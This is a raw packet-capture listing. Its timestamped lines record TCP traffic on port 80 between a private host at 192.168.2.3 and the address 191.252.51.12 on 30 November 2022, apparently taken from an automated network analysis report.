                                                  Nov 30, 2022 00:37:12.549592972 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.549607038 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.549626112 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.549640894 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.549643993 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.549664021 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.549680948 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.549684048 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.549704075 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.549722910 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.549725056 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.549741983 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.549751043 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.549762011 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.549781084 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.549781084 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.549799919 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.549818993 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.549839020 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.549841881 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.549858093 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.549875021 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.549877882 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.549899101 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.549916983 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.549921989 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.549935102 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.549957991 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.549982071 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.596430063 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.596510887 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.596637011 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.648230076 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.648284912 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.648413897 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.657377005 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.657428026 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.657473087 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.657506943 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.657536983 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.657536030 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.657572031 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.657588005 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.657629013 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.657643080 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.657665014 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.657701015 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.657717943 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.657737017 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.657761097 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.657792091 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.657799006 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.657828093 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.657857895 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.657867908 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.657896996 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.657933950 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.657938957 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.657975912 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.657991886 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.658010960 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658042908 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658060074 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.658073902 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658103943 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658119917 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.658134937 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658162117 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658194065 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.658196926 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658227921 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658238888 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.658256054 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658283949 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658293009 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.658313990 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658345938 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658354998 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.658369064 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658409119 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658431053 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.658447027 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658483028 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658495903 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.658521891 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658550978 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658565998 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.658582926 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658612013 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658642054 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.658648014 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658683062 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658694029 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.658721924 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658757925 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658766985 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.658796072 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658829927 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658838987 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.658865929 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658905029 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658906937 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.658936977 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658972025 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.658984900 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.659003973 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.659037113 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.659053087 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.659070969 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.659123898 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.685842037 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.685884953 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.685909986 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.685929060 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.685950994 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.685970068 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.686029911 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.686073065 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.691786051 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.691821098 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.691848993 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.691871881 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.691893101 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.691915989 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.691930056 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.691939116 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.691961050 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.691971064 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.691983938 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692007065 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692013979 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.692028999 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692051888 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692055941 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.692074060 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692094088 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.692096949 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692118883 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692136049 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.692141056 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692167044 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692187071 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.692189932 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692212105 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692231894 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.692234993 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692256927 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692280054 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692282915 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.692301989 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692320108 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.692325115 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692348003 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692368031 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692368031 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.692392111 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692410946 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.692414045 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692436934 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692456961 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.692470074 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692491055 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692512989 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692527056 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.692533016 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692553043 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.692554951 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692575932 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692595959 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692600012 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.692616940 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692637920 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692639112 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.692657948 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692676067 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692684889 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.692698002 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692718029 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692718029 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.692738056 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692761898 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692770958 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.692786932 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692807913 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692814112 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.692830086 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692850113 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692853928 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.692871094 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692890882 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692902088 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.692909956 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692929029 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692934990 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.692950964 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692970991 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.692976952 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.692990065 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693008900 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693021059 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.693031073 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693051100 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693061113 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.693073034 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693094015 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693101883 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.693114042 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693135023 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693145037 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.693156004 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693176985 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693180084 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.693200111 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693219900 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693224907 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.693240881 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693259954 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693267107 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.693280935 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693300962 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693310022 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.693321943 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693344116 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693346024 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.693366051 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693386078 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693391085 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.693408012 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693428040 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693433046 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.693449020 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693471909 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693474054 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.693491936 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693512917 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693519115 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.693532944 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693552971 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693559885 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.693572998 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693594933 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693603992 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.693615913 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693634987 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693644047 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.693656921 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693676949 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693690062 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.693697929 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693717003 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.693721056 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693741083 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693758965 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693772078 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.693804979 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693825960 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.693828106 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693850994 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693871975 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693876982 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.693893909 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693913937 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693921089 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.693936110 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693957090 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.693963051 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.693979025 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694000959 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694005013 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.694021940 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694045067 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694047928 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.694070101 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694092035 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694103003 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.694113970 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694134951 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694143057 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.694156885 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694178104 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694186926 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.694200993 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694222927 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694226027 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.694245100 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694264889 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694267988 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.694287062 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694308996 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694309950 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.694329977 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694350958 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694355011 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.694372892 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694394112 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694396973 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.694416046 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694437027 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694442034 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.694458961 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694479942 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694483995 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.694500923 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694524050 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694535971 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.694540977 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694552898 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694577932 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694596052 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.694600105 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694622040 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694638968 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.694650888 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694662094 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.694673061 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694694996 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694705009 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.694716930 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694739103 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694742918 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.694761038 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694786072 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.694787979 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694808960 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694830894 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694833994 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.694852114 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694880009 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.694889069 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694916010 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694936991 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694940090 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.694957972 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694978952 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.694983006 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.694999933 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.695020914 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.695024967 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.695043087 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.695064068 CET8049698191.252.51.12192.168.2.3
